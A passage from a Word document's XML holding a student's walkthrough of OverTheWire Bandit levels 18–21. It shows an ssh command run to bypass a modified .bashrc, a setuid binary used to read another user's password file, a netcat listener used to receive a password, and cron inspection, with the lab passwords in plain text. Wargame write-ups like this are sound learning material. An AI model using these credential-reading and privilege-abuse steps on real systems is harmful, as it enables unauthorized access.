    <w:p w14:paraId="7D51A440" w14:textId="77777777" w:rsidR="00690FED" w:rsidRDefault="00690FED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</w:p>
    <w:p w14:paraId="555AC255" w14:textId="77777777" w:rsidR="00690FED" w:rsidRDefault="00690FED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</w:p>
    <w:p w14:paraId="2EB84492" w14:textId="4017350B" w:rsidR="00DA1A2E" w:rsidRDefault="00DA1A2E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DA1A2E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit1</w:t>
      </w:r>
      <w:r w:rsidR="00852289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90290D" w14:textId="18E917CD" w:rsidR="00DA1A2E" w:rsidRDefault="00690FED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From the mission description I understand someone modified the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26D51">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.bshrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, and that’s why I can’t log in to user bandit18!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D50B81" w14:textId="52274022" w:rsidR="00690FED" w:rsidRDefault="00690FED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629F230A" w14:textId="661A849A" w:rsidR="009C0D49" w:rsidRDefault="009C0D49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entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0D49">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat readme"</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0D49">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs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 xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="0045026C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>logging into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> bandit18 user and then immediately get the context of readme file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D44440" w14:textId="400EEEF4" w:rsidR="00690FED" w:rsidRDefault="009C0D49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The </w:t>
      </w:r>
      <w:r w:rsidR="0045026C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">command’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">output was: </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0D49">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F1CCDA" w14:textId="324C823D" w:rsidR="006D28A3" w:rsidRDefault="006D28A3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3C2D3D18" w14:textId="548684ED" w:rsidR="006D28A3" w:rsidRDefault="006D28A3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6D28A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45992885" w14:textId="1494F84C" w:rsidR="0045291E" w:rsidRDefault="007320D1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After reading a little about </w:t>
      </w:r>
      <w:r w:rsidRPr="007320D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, I entered </w:t>
      </w:r>
      <w:r w:rsidRPr="007320D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command for viewing all folder’s files. I saw there was an executable file called: </w:t>
      </w:r>
      <w:r w:rsidRPr="007320D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“bandit20-do”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE46732" w14:textId="346C23D6" w:rsidR="00562A47" w:rsidRDefault="00562A47" w:rsidP="002E241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execute the file using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>./bandit20-do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D91C28" w14:textId="7728A2B9" w:rsidR="00562A47" w:rsidRPr="00562A47" w:rsidRDefault="00403B7A" w:rsidP="00562A4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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00562A47" w:rsidRPr="00562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run a command as another user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A785CF" w14:textId="533F4D9D" w:rsidR="00562A47" w:rsidRDefault="00562A47" w:rsidP="00562A4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562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  Example: ./bandit20-do id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E91614B" w14:textId="6F663AE3" w:rsidR="00562A47" w:rsidRDefault="00403B7A" w:rsidP="00562A4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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F80BA" w14:textId="77777777" w:rsidR="005F352A" w:rsidRDefault="005F352A" w:rsidP="00562A4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6C5B181A" w14:textId="3E17DB94" w:rsidR="00562A47" w:rsidRDefault="00562A47" w:rsidP="00562A4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First, I tried to enter the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>./bandit20-do 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, but got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“env: ‘20’: No such file or directory”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493E0B7" w14:textId="01B4A9B0" w:rsidR="00562A47" w:rsidRDefault="00562A47" w:rsidP="00562A4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Then I realized the binary file expected to get a command as argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE78DE" w14:textId="3826A10F" w:rsidR="00562A47" w:rsidRDefault="00562A47" w:rsidP="00562A4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entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>./bandit20-do cat /etc/bandit_pass/bandit20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00562A47">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GbKksEFF4yrVs6il55v6gwY5aVje5f0j</w:t>
      </w:r>
      <w:r w:rsidR="00952EA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD8C9F" w14:textId="6608973C" w:rsidR="00952EA4" w:rsidRDefault="00952EA4" w:rsidP="00562A4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729ED314" w14:textId="49129141" w:rsidR="00952EA4" w:rsidRDefault="00952EA4" w:rsidP="00562A4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952EA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B407B" w14:textId="3816F25F" w:rsidR="00952EA4" w:rsidRDefault="0041465A" w:rsidP="00562A4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For this exercise I used </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2F2E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tmux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="0041465A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>tmux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CEBF8" w14:textId="3B0FCACA" w:rsidR="0041465A" w:rsidRDefault="0041465A" w:rsidP="00562A4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Then I split the window using </w:t>
      </w:r>
      <w:r w:rsidRPr="0041465A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ctrl+b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidRPr="0041465A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E36B91" w14:textId="4DD8BB8C" w:rsidR="0041465A" w:rsidRDefault="0041465A" w:rsidP="00562A4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0E9FC9D9" w14:textId="43F63DD3" w:rsidR="0041465A" w:rsidRDefault="0041465A" w:rsidP="00562A4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n the first window I created a server on port 6969 using the command: </w:t>
      </w:r>
      <w:r w:rsidR="003D7113" w:rsidRPr="003D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nc -l -p 6969</w:t>
      </w:r>
      <w:r w:rsidR="003D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AEA0E4" w14:textId="7EDA5383" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="00562A4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And then entered the previous level’s password (</w:t>
      </w:r>
      <w:r w:rsidRPr="003D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GbKksEFF4yrVs6il55v6gwY5aVje5f0j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A252FD" w14:textId="4B565FE5" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="00562A4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4BA99F92" w14:textId="690F2F90" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="00562A4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n the second window I executed the setuid binary using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>./suconnect 6969</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB84E6" w14:textId="2F565475" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="003D711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And received the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A1209" w14:textId="6CAE73C3" w:rsidR="003D7113" w:rsidRPr="003D7113" w:rsidRDefault="003D7113" w:rsidP="003D711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3D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B2119" w14:textId="3268886A" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="003D711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3D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password matches, sending next password”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4627CA" w14:textId="7171760D" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="003D711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28CAD2BA" w14:textId="43DC017C" w:rsidR="003D7113" w:rsidRDefault="003D7113" w:rsidP="003D711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n the first window the output was: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D7113">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A31D998" w14:textId="15759D79" w:rsidR="004E5655" w:rsidRDefault="004E5655" w:rsidP="003D711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73E219F8" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="7CD32C03" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="2873A34E" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="565F4FBC" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="306F7518" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="79C6AAD4" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="3E75FCB2" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="7D48B07A" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="004A2F2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</w:p>
    <w:p w14:paraId="2C58721A" w14:textId="4F6BFFFF" w:rsidR="004E5655" w:rsidRPr="004A2F2E" w:rsidRDefault="004E5655" w:rsidP="004A2F2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4E5655">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47D15C" w14:textId="706870F4" w:rsidR="003D7113" w:rsidRDefault="004A2F2E" w:rsidP="003D711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First, I read about </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2F2E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00521B1E" w:rsidRPr="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r w:rsidR="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D11">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>man cron</w:t>
      </w:r>
      <w:r w:rsidR="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00521B1E" w:rsidRPr="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r w:rsidR="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00521B1E" w:rsidRPr="00521B1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>crontab(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C22CD6" w14:textId="37195A32" w:rsidR="00BD1997" w:rsidRDefault="00BD1997" w:rsidP="003D711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Then, I looked in</w:t>
      </w:r>
      <w:r w:rsidR="001961C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the configuration file using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1997">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /etc/cron.d/cronjob_bandit22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595D73C" w14:textId="77777777" w:rsidR="00BD1997" w:rsidRPr="00BD1997" w:rsidRDefault="00BD1997" w:rsidP="00BD199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BD1997">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“@reboot bandit22 /usr/bin/cronjob_bandit22.sh &amp;&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120327F" w14:textId="206EE78C" w:rsidR="00BD1997" w:rsidRPr="00BD1997" w:rsidRDefault="00BD1997" w:rsidP="00BD199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BD1997">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
